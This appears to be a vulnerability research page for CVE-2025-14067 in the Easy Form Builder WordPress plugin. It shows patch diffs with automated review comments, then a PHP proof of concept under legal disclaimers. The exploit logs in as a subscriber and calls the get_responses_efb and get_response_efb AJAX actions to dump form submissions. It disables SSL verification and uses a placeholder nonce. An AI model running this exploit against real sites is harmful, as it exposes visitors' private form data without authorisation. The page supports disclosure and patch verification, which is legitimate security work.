+        $installed_version = get_option('emsfb_version', '0.0.0');
+        $current_version = EMSFB_PLUGIN_VERSION;
+
+
+        if (version_compare($installed_version, $current_version, '<')) {
+            $this->run_upgrade_tasks_efb($installed_version, $current_version);
+            update_option('emsfb_version', $current_version);
+        }
+    }
+
+    /**
+     * Run upgrade tasks after plugin update
+     *
+     * @since 3.9.4
+     * @param string $old_version Old plugin version
+     * @param string $new_version New plugin version
+     * @return void
+     */
+    private function run_upgrade_tasks_efb($old_version, $new_version) {
+
+        if (function_exists('wp_cache_flush')) {
+            wp_cache_flush();
+        }
+
+
+        if (function_exists('wp_cache_flush_group')) {
+            wp_cache_flush_group('emsfb');
+        }
+
+
+        global $wpdb;
+        $wpdb->query(
+            "DELETE FROM {$wpdb->options} WHERE option_name LIKE '_transient_efb_%' OR option_name LIKE '_transient_timeout_efb_%'"
+        );
+
+
+        error_log(sprintf(
+            'Easy Form Builder upgraded from %s to %s - All caches cleared',
+            $old_version,
+            $new_version
+        ));
+    }
+
+    /**
+     * Hook that runs when plugin is updated via WordPress admin
+     *
+     * @since 3.9.4
+     * @param object $upgrader_object Plugin upgrader object
+     * @param array $options Update options
+     * @return void
+     */
+    public function plugin_update_completed_efb($upgrader_object, $options) {
+
+        if ($options['action'] !== 'update' || $options['type'] !== 'plugin') {
+            return;
+        }
+
+
+        $our_plugin = plugin_basename(EMSFB_PLUGIN_FILE);
+
+        if (isset($options['plugins'])) {
+            foreach ($options['plugins'] as $plugin) {
+                if ($plugin === $our_plugin) {
+
+                    $this->run_upgrade_tasks_efb(
+                        get_option('emsfb_version', '0.0.0'),
+                        EMSFB_PLUGIN_VERSION
+                    );
+                    break;
+                }
+            }
+        }
+    }
+
 }
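Review bot: `run_upgrade_tasks_efb()` runs twice after an admin-driven update: `plugin_update_completed_efb()` calls it without updating `emsfb_version`, so `check_version_and_upgrade_efb()` still sees the old version on the next `plugins_loaded` and runs it again. Update the option in both paths, or keep only the `plugins_loaded` path. In `"DELETE FROM {$wpdb->options} WHERE option_name LIKE '_transient_efb_%' OR option_name LIKE '_transient_timeout_efb_%'"`, `_` is a single-character wildcard in `LIKE`, so the pattern matches more than the intended prefix; build it with `$wpdb->esc_like()` and run it through `$wpdb->prepare()`. `$options['action']` and `$options['type']` are read without `isset()`, and `upgrader_process_complete` fires for other upgrader types and option shapes, so guard them. The unconditional `error_log()` will land in production logs on every upgrade; gate it on `WP_DEBUG`.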
--- a/easy-form-builder/includes/functions.php
+++ b/easy-form-builder/includes/functions.php
@@ -1713,7 +1713,15 @@


 		}else{
-			require_once(ABSPATH . 'wp-admin/includes/file.php');
+			$path= ABSPATH . 'wp-admin/includes/file.php';
+			if ( ! file_exists( $path ) ) {
+
+				return false;
+			}else{
+				require_once( ABSPATH . 'wp-admin/includes/file.php' );
+			}
+
+
 			if (WP_Filesystem()) {
 				global $wp_filesystem;

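Review bot: after computing `$path`, the `else` branch still calls `require_once( ABSPATH . 'wp-admin/includes/file.php' )` instead of `require_once( $path )`, so the check and the include can drift apart; use the variable. The `else` is unnecessary after `return false;`, and the blank lines inside the `if` body are leftovers.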
--- a/easy-form-builder/vendor/composer/InstalledVersions.php
+++ b/easy-form-builder/vendor/composer/InstalledVersions.php
@@ -264,8 +264,8 @@
         @trigger_error('getRawData only returns the first dataset loaded, which may not be what you expect. Use getAllRawData() instead which returns all datasets for all autoloaders present in the process.', E_USER_DEPRECATED);

         if (null === self::$installed) {
-
-
+            // only require the installed.php file if this file is loaded from its dumped location,
+            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
             if (substr(__DIR__, -8, 1) !== 'C') {
                 self::$installed = include __DIR__ . '/installed.php';
             } else {
@@ -337,8 +337,8 @@
         }

         if (null === self::$installed) {
-
-
+            // only require the installed.php file if this file is loaded from its dumped location,
+            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
             if (substr(__DIR__, -8, 1) !== 'C') {
                 self::$installed = require __DIR__ . '/installed.php';
             } else {

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14067 - Easy Form Builder <= 3.9.3 - Missing Authorization to Authenticated (Subscriber+) Sensitive Form Response Data Exposure

<?php
/**
 * Proof of Concept for CVE-2025-14067
 * Requires: WordPress installation with Easy Form Builder plugin <= 3.9.3
 *          Valid subscriber-level credentials
 *          A form with existing submissions
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_password';

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Authenticate to WordPress and obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Extract nonce from admin page (required for AJAX requests)
// The vulnerability's flawed logic may allow bypass, but we include nonce for completeness
$admin_url = $target_url . '/wp-admin/admin.php?page=emsfb';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would parse HTML)
// Nonce is typically in JavaScript or hidden fields
$nonce = 'wp_rest_nonce_value'; // This would be extracted from the page

// Step 3: Exploit vulnerable AJAX endpoint to retrieve form responses
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'get_responses_efb', // Vulnerable AJAX action
    'nonce' => $nonce, // May be bypassed due to logical error
    'form_id' => '1', // Target form ID
    'page' => '1', // Pagination
    'per_page' => '50' // Number of responses to retrieve
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));

$ajax_response = curl_exec($ch);

// Display results
echo "Target: " . $target_url . "\n";
echo "Vulnerable Endpoint: " . $ajax_url . "\n";
echo "AJAX Action: " . $exploit_data['action'] . "\n";
echo "\nResponse:\n";
echo $ajax_response . "\n";

// Step 4: Additional exploitation - retrieve specific response
$exploit_data['action'] = 'get_response_efb';
$exploit_data['response_id'] = '1'; // Target specific response ID

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$specific_response = curl_exec($ch);

echo "\nSpecific Response Data:\n";
echo $specific_response . "\n";

curl_close($ch);

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>
